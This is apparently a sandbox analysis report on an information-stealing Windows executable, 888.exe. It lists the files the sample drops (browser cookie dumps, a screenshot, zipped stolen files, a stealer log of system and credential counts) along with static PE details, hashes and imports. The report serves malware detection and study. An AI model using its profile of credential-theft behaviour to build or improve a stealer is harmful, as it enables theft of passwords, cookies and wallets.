                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\Cookies\Chrome_Default_Network.txt

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):286
                                                                      Entropy (8bit):5.814660491850138
                                                                      Encrypted:false
                                                                      SSDEEP:6:PkU6WJ2bxbyvcKGWMNjIqbu1YIqyRHXmagzyCAuiDOq0pxjbH:cU90bI7BQu1YIqimlFtqOTxjL
                                                                      MD5:0F9F816FA9E25BDCE7FD93ED917E57D5
                                                                      SHA1:498B69ACAAA3D4E91CDA7C8259DDC8BD0103EC3D
                                                                      SHA-256:05A6719FD72A40BCB9EC7F61375FF69E65B147460ABB18EBE4DDD5A224CF2776
                                                                      SHA-512:790AAE9F59C09C3111FB71597807C92DD78408278A8CD47A640B117D86BA6D4B9E18414CF3D8E9A23756CBF63B84AC17DA1305D5C92866F7A8A7F7E27867DC5F
                                                                      Malicious:false
                                                                      Preview:.google.com.false./.true.13343565070843817.1P_JAR.2023-10-05-09...google.com.true./.true.13356784270843860.NID.511=lfE2Vn6ILT7VijDzEeQ7E2-WcCFI3koiTt40Tat-ZoveQCzLQNIH_rXzfWB54vEWybmaNRxITXOcCnjhl2RsSuhlZev-zYHRHJAkTOSXgQ4rpQpZHRrNCKlp2Q4N2yfvnVbdmOY5S4gOBWPvZrZOiPLdLoEjpjyr1IKWdaFiwQo

                                                                      C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\screen1.png

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                      Category:dropped
                                                                      Size (bytes):870214
                                                                      Entropy (8bit):7.513770474173408
                                                                      Encrypted:false
                                                                      SSDEEP:12288:rcVRUkGAeVI4BoyfLgJKWa5ImQpS803G4Cq5YK8yUenanQnAO3phYizPK2:YVzlEBBeJ55A802Nmn4Qnz3Rm2
                                                                      MD5:AAB90E2AA6E8815DC0FEEEE8F12B266D
                                                                      SHA1:5896D173285EA2741D6D066017385E31D2C8A13B
                                                                      SHA-256:FFCDAB457081F79D01E70D7D216A82E301369C77DA0882B5E4C573ABB9D0A445
                                                                      SHA-512:2BC6D30DBF374EFF67AB385EA9518437A3D1462AC3D9C97E0475B8C4880C0755A0706AA8AD254DC04C01C713AC35080774742A09DA154E75C4EAB4EB40ADC24B
                                                                      Malicious:false
                                                                      Preview:.PNG........IHDR................C..G.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6...".....I)..H""..L.$a..I.d&...$.R..m$!..d&..$$.....~...@)..`.&."...d..T..Ak.Z+.V.i...m.i"3). .....q..@...Mf..H"".L2..D...U2..D...m.q$....&.If.../"..$.2...6..$.(".Df..H....8.d&..@f.PJ.6..`...O..Af.0M.}.Ske.^s?..D....@D....IHB..If...R....ls?.R.Dk........d&...... "h.1...m2..IB..

                                                                      C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\sensitive-files.zip

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):14988
                                                                      Entropy (8bit):7.828470268563519
                                                                      Encrypted:false
                                                                      SSDEEP:192:6ILU6hBR67urKjClKjCAk8tkC9NILU6hBR67urKjClKjCAk8tkC97yKMz:6MU6WwZlZA9ttNMU6WwZlZA9ttuKMz
                                                                      MD5:49EEE1B280B8CA46420AFCBD63FE54C5
                                                                      SHA1:35CFF1BF5800749EFC0CF3D7F41F43A5C966829B
                                                                      SHA-256:FAB8FE67CF10B87B2E9005E77F87CD32519C7D54B897BD4EB04BF6B3813E762B
                                                                      SHA-512:7DD0FD623178EB1ACDFFC7A8A6656E462103F6A363F052F30672E69BBE38113505F8D84067968BA04ABBF9C225D3C49E9009812E8BF9B3B2AEE188375760F971
                                                                      Malicious:false
                                                                      Preview:PK........Hk.Y..+.............BNAGMGSPLO.pdf..I.E!......gEP..p..|7....,../^*r.._[....B.....wr.9n~$|.*.r.\.[&....J..$c..u..@..e.(g..N[..Sko..:...B..T...cz.>:a'.....y..MXW.y...N...(%$.W.....U.x.0.........Yf.[.-..@j.A;.a$a51Gw.].0.n.....q.a..L(X!..wF....E..........l.Ci.!...V....eZ..In..%.%..."}E...+cu.s#.V..qPsa..EDy|.......*..p.]..l&.TR..:|....v..>[...TV.j..|.M...e0....;Y..%.w...d.T.{.U.&...vU.q)S.HdG.....6...R....VE...&P.N....e ....bq_j*.#d..}..l.yF........4E.N..Y.O.6D....|.....v..6j.1>.O...X..W.9x.z....EO.#...i.*_T.Kq....t.../9J........F..u..v..`..v..H.w.|v.4N....^...A.zY4....;7..k|....a...N.....k.W..CeMgQ.~..f....8z...h...'.....n.....q.!.)....PK........Hk.Y.y>............EEGWXUHVUG.png...q@!.C.IQ.........&g.0z......R.|...[P....G..|>..[(n.<....S6c*L......t..:.I2lZ.Y..a..|.Y..5,.T........3.z...{...z..gm;..v.(FQX.AP..../.V..L..G...R......Y,2H...k\.T..K.;...!l.....:..M!X...N.x..>.k.m..!..6..."FK./..<6@gjq`..O.W...cK.Tc.B.|F..x........

                                                                      C:\Users\user\AppData\Local\Temp\Tf3PLLaybbhhT996exLfW29uv4B7ta\user_info.txt

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):712
                                                                      Entropy (8bit):5.33064589888181
                                                                      Encrypted:false
                                                                      SSDEEP:12:eM3lxmRQN3oi238Q8h0x6YFArJFJNlQM7NlVPBQM3aWflIHdAMij01mMXaBLgSEW:eQNNYv38z0xVFKUM7NlVPe8lOAMijUm9
                                                                      MD5:B7BC07CE4B1B6BFBCE0AE032C761B0E2
                                                                      SHA1:963095D221A75CF310A92932097CC416AB309EDA
                                                                      SHA-256:06C5F8313883B432BE9AA20F6BBFD2358CA814FE284EC52D1A9FE1E26DE8B235
                                                                      SHA-512:70D061F51968ABBFCF55CEA9D8A2FE0F6BE05BEFB289A7551DDAC1923E63838344CA598A32E47B93FA7FFCAD65077A25BE72E5277CAF46290EE34C5CFAEE9F0D
                                                                      Malicious:false
                                                                      Preview:..- IP Info -....IP: 8.46.123.189..Country: United States..City: New York..Postal: 10000..ISP: Level - A3356..Timezone: -05:00....- PC Info -....Username: user..OS: Microsoft Windows 10 Pro..CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..GPU: PGFKD3 (1280, 1024)..HWID: 5146949416814903..Current Language: English (United States)..FileLocation: C:\Users\user\Desktop\888.exe..Is Elevated: true....- Other Info -....Antivirus: .. - Windows Defender....- Log Info -.....Build:_____....Passwords: ....Cookies: . 2...Wallets: ....Files: . 20...Credit Cards: ....Servers FTP/SSH: ....Discord Tokens: ....Telegram: .......Tagged URLs: ....Tagged Cookies: .......Tags Passwords: .....Tags Cookies:

                                                                      C:\Users\user\AppData\Local\Temp\Web Data

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1368932887859682
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                                      MD5:9A534FD57BED1D3E9815232E05CCF696
                                                                      SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                                      SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                                      SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baec3m4m.q1x.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilgmct35.tx1.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\out.zip

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                      Category:dropped
                                                                      Size (bytes):889682
                                                                      Entropy (8bit):7.526670681834435
                                                                      Encrypted:false
                                                                      SSDEEP:12288:wcVRUkGAeVI4BoyfLgJKWa5ImQpS803G4Cq5YK8yUenanQnAO3phYizPKj:3VzlEBBeJ55A802Nmn4Qnz3Rmj
                                                                      MD5:711018DD053772F1927370E574DF5C67
                                                                      SHA1:DE587EF11CA26F68DA61008CA38EB8C068CD2701
                                                                      SHA-256:352F6DEE127C1ACAF31D31E293A523FD2BBEF8D8F5E6259A9815110961AEE5DE
                                                                      SHA-512:490AB6ACDC09BAA0454FABB3072B8756D5D2E55D0EA3E6C25D567D6E6CCB06462840FB290A80B2DC34D4EC2A1EE5B1B3D90077F0F71BDD047E008263D43533C4
                                                                      Malicious:false
                                                                      Preview:PK........Lk.Y................Autofill/PK........Lk.Y................Cookies/PK........Lk.Y................CreditCards/PK........Lk.Y................Downloads/PK........Lk.Y................History/PK........Lk.Y................Passwords/PK........Lk.Y..;.FG..FG......screen1.png.PNG........IHDR................C..G.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.

                                                                      C:\Users\user\AppData\Local\Temp\sensitive-files.zip

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                      Category:dropped
                                                                      Size (bytes):14988
                                                                      Entropy (8bit):7.828470268563519
                                                                      Encrypted:false
                                                                      SSDEEP:192:6ILU6hBR67urKjClKjCAk8tkC9NILU6hBR67urKjClKjCAk8tkC97yKMz:6MU6WwZlZA9ttNMU6WwZlZA9ttuKMz
                                                                      MD5:49EEE1B280B8CA46420AFCBD63FE54C5
                                                                      SHA1:35CFF1BF5800749EFC0CF3D7F41F43A5C966829B
                                                                      SHA-256:FAB8FE67CF10B87B2E9005E77F87CD32519C7D54B897BD4EB04BF6B3813E762B
                                                                      SHA-512:7DD0FD623178EB1ACDFFC7A8A6656E462103F6A363F052F30672E69BBE38113505F8D84067968BA04ABBF9C225D3C49E9009812E8BF9B3B2AEE188375760F971
                                                                      Malicious:false
                                                                      Preview:PK........Hk.Y..+.............BNAGMGSPLO.pdf..I.E!......gEP..p..|7....,../^*r.._[....B.....wr.9n~$|.*.r.\.[&....J..$c..u..@..e.(g..N[..Sko..:...B..T...cz.>:a'.....y..MXW.y...N...(%$.W.....U.x.0.........Yf.[.-..@j.A;.a$a51Gw.].0.n.....q.a..L(X!..wF....E..........l.Ci.!...V....eZ..In..%.%..."}E...+cu.s#.V..qPsa..EDy|.......*..p.]..l&.TR..:|....v..>[...TV.j..|.M...e0....;Y..%.w...d.T.{.U.&...vU.q)S.HdG.....6...R....VE...&P.N....e ....bq_j*.#d..}..l.yF........4E.N..Y.O.6D....|.....v..6j.1>.O...X..W.9x.z....EO.#...i.*_T.Kq....t.../9J........F..u..v..`..v..H.w.|v.4N....^...A.zY4....;7..k|....a...N.....k.W..CeMgQ.~..f....8z...h...'.....n.....q.!.)....PK........Hk.Y.y>............EEGWXUHVUG.png...q@!.C.IQ.........&g.0z......R.|...[P....G..|>..[(n.<....S6c*L......t..:.I2lZ.Y..a..|.Y..5,.T........3.z...{...z..gm;..v.(FQX.AP..../.V..L..G...R......Y,2H...k\.T..K.;...!l.....:..M!X...N.x..>.k.m..!..6..."FK./..<6@gjq`..O.W...cK.Tc.B.|F..x........

                                                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite-shm

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):32768
                                                                      Entropy (8bit):0.017262956703125623
                                                                      Encrypted:false
                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                      Malicious:false
                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.549321465629513
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:888.exe
                                                                      File size:4'885'504 bytes
                                                                      MD5:b6e5859c20c608bf7e23a9b4f8b3b699
                                                                      SHA1:302a43d218e5fd4e766d8ac439d04c5662956cc3
                                                                      SHA256:bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
                                                                      SHA512:60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c
                                                                      SSDEEP:98304:MUnvs+Q1S4tPjBjz7eO9C8LJ/INWoDBk:pPoljfT/J8
                                                                      TLSH:3C36AF82FAC342FED98B15B0202FB73FDB351D0E8214CB93EBD45D21E866712599A25D
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}C.t.C.t.C.t.J...Q.t.Ebq/d.t.Ebp/R.t.Ebw/W.t...u/U.t...u/@.t.C.u.k.t..bp/Y.t.C.t.G.t..bv/B.t.RichC.t.........PE..L.....Df...

                                                                      File Icon

                                                                      Icon Hash:90cececece8e8eb0

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x746992
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6644CE9A [Wed May 15 15:02:50 2024 UTC]
                                                                      TLS Callbacks:0x6116f0
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:2cf92bf8d9707fcbea09d995433c19b6

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      call 00007F91D109D7FEh
                                                                      jmp 00007F91D109CBE9h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ecx
                                                                      lea ecx, dword ptr [esp+04h]
                                                                      sub ecx, eax
                                                                      sbb eax, eax
                                                                      not eax
                                                                      and ecx, eax
                                                                      mov eax, esp
                                                                      and eax, FFFFF000h
                                                                      cmp ecx, eax
                                                                      jc 00007F91D109CD7Ch
                                                                      mov eax, ecx
                                                                      pop ecx
                                                                      xchg eax, esp
                                                                      mov eax, dword ptr [eax]
                                                                      mov dword ptr [esp], eax
                                                                      ret
                                                                      sub eax, 00001000h
                                                                      test dword ptr [eax], eax
                                                                      jmp 00007F91D109CD5Bh
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebx
                                                                      push esi
                                                                      mov eax, dword ptr [esp+18h]
                                                                      or eax, eax
                                                                      jne 00007F91D109CD8Ah
                                                                      mov ecx, dword ptr [esp+14h]
                                                                      mov eax, dword ptr [esp+10h]
                                                                      xor edx, edx
                                                                      div ecx
                                                                      mov ebx, eax
                                                                      mov eax, dword ptr [esp+0Ch]
                                                                      div ecx
                                                                      mov edx, ebx
                                                                      jmp 00007F91D109CDB3h
                                                                      mov ecx, eax
                                                                      mov ebx, dword ptr [esp+14h]
                                                                      mov edx, dword ptr [esp+10h]
                                                                      mov eax, dword ptr [esp+0Ch]
                                                                      shr ecx, 1
                                                                      rcr ebx, 1
                                                                      shr edx, 1
                                                                      rcr eax, 1
                                                                      or ecx, ecx
                                                                      jne 00007F91D109CD66h
                                                                      div ebx
                                                                      mov esi, eax
                                                                      mul dword ptr [esp+18h]
                                                                      mov ecx, eax
                                                                      mov eax, dword ptr [esp+14h]
                                                                      mul esi
                                                                      add edx, ecx
                                                                      jc 00007F91D109CD80h
                                                                      cmp edx, dword ptr [esp+10h]
                                                                      jnbe 00007F91D109CD7Ah
                                                                      jc 00007F91D109CD79h
                                                                      cmp eax, dword ptr [esp+0Ch]
                                                                      jbe 00007F91D109CD73h
                                                                      dec esi
                                                                      xor edx, edx
                                                                      mov eax, esi
                                                                      pop esi
                                                                      pop ebx
                                                                      retn 0010h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      push ebx
                                                                      mov eax, dword ptr [esp+14h]
                                                                      or eax, eax
                                                                      jne 00007F91D109CD8Ah
                                                                      mov ecx, dword ptr [esp+10h]
                                                                      mov eax, dword ptr [esp+0Ch]
                                                                      xor edx, edx
                                                                      div ecx
                                                                      mov eax, dword ptr [esp+08h]

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [IMP] VS2008 SP1 build 30729

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4883ac0x1a4.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4910000x1b9b0.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x485b680x1c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x485bc00x18.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x485aa80x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x35a0000x4c0.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x3581490x35820058b136b0f6e324f2ea36c2001a61946aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x35a0000x1300760x130200c9dcd221b89f5ff0a86117992a3d645eFalse0.4299684674270448data5.926312917040969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x48b0000x529c0x4a00cddfd669d1b848d82c68d8beaa9711ecFalse0.5308277027027027Matlab v4 mat-file (little endian) , numeric, rows 4394632, columns 05.058826172235092IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .reloc0x4910000x1b9b00x1ba00f2f1f26ec7745ce120ed00fd5821e132False0.6490384615384616data6.68083376427154IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Imports

                                                                      DLLImport
                                                                      ntdll.dllNtCancelIoFileEx, NtCreateFile, NtWriteFile, NtReadFile, RtlNtStatusToDosError, NtDeviceIoControlFile, RtlCaptureContext, RtlUnwind
                                                                      kernel32.dllGetFileInformationByHandle, FlushFileBuffers, WakeConditionVariable, SleepConditionVariableSRW, GetModuleHandleA, GetProcAddress, GetCurrentThread, InitOnceBeginInitialize, TlsAlloc, InitOnceComplete, TlsFree, GetStdHandle, GetConsoleMode, MultiByteToWideChar, WriteConsoleW, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, WaitForSingleObjectEx, WakeAllConditionVariable, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, SetFilePointerEx, FindNextFileW, CreateDirectoryW, FindFirstFileW, FindClose, SetThreadStackGuarantee, SetFileCompletionNotificationModes, CreateIoCompletionPort, TryAcquireSRWLockExclusive, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, CreateNamedPipeW, AddVectoredExceptionHandler, ReadFileEx, SleepEx, RaiseException, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, GetSystemTimeAsFileTime, GetCurrentDirectoryW, AcquireSRWLockShared, ReleaseSRWLockShared, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, UnhandledExceptionFilter, GetLastError, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, WideCharToMultiByte, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, GetExitCodeProcess, CreateFileW, WaitForSingleObject, InitializeSListHead, TlsGetValue, TlsSetValue, GetProcessHeap, CreateThread, HeapAlloc, HeapReAlloc, CloseHandle, HeapFree, IsDebuggerPresent, EncodePointer, InitializeCriticalSectionAndSpinCount, LoadLibraryExW, LoadLibraryA, WriteFileEx
                                                                      user32.dllEnumDisplayMonitors, EnumDisplaySettingsExW, GetMonitorInfoW
                                                                      ws2_32.dllselect, setsockopt, getaddrinfo, WSASocketW, freeaddrinfo, getsockopt, WSASend, accept, closesocket, ioctlsocket, WSAStartup, socket, getsockname, WSAGetLastError, getpeername, connect, WSACleanup, recv, shutdown, send, WSAIoctl, bind, listen
                                                                      bcrypt.dllBCryptGenRandom
                                                                      advapi32.dllRegCloseKey, AllocateAndInitializeSid, RegOpenKeyExW, SystemFunction036, FreeSid, CheckTokenMembership, RegQueryValueExW
                                                                      crypt32.dllCryptUnprotectData, CertEnumCertificatesInStore, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertDuplicateCertificateChain, CertGetCertificateChain, CertFreeCertificateContext, CertCloseStore, CertDuplicateCertificateContext, CertOpenStore, CertDuplicateStore, CertAddCertificateContextToStore
                                                                      secur32.dllApplyControlToken, AcquireCredentialsHandleA, QueryContextAttributesW, FreeCredentialsHandle, AcceptSecurityContext, DeleteSecurityContext, FreeContextBuffer, InitializeSecurityContextW, EncryptMessage, DecryptMessage
                                                                      oleaut32.dllSysFreeString, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayUnaccessData, SysAllocStringLen, VariantClear
                                                                      rstrtmgr.dllRmStartSession, RmGetList, RmRegisterResources
                                                                      ole32.dllCoInitializeEx, CoSetProxyBlanket, CoCreateInstance, CoInitializeSecurity
                                                                      gdi32.dllSetStretchBltMode, StretchBlt, GetDIBits, GetObjectW, DeleteObject, CreateCompatibleDC, DeleteDC, GetDeviceCaps, CreateDCW, SelectObject, CreateCompatibleBitmap
                                                                      api-ms-win-crt-string-l1-1-0.dllstrcpy_s, strlen, strcmp, strcspn, strncmp, wcsncmp
                                                                      api-ms-win-crt-math-l1-1-0.dll_dclass, log, ceil, pow, exp2f, __setusermatherr, roundf, truncf
                                                                      api-ms-win-crt-heap-l1-1-0.dllmalloc, realloc, _msize, _set_new_mode, free, calloc
                                                                      api-ms-win-crt-utility-l1-1-0.dllqsort, _rotl64
                                                                      api-ms-win-crt-time-l1-1-0.dll_localtime64_s
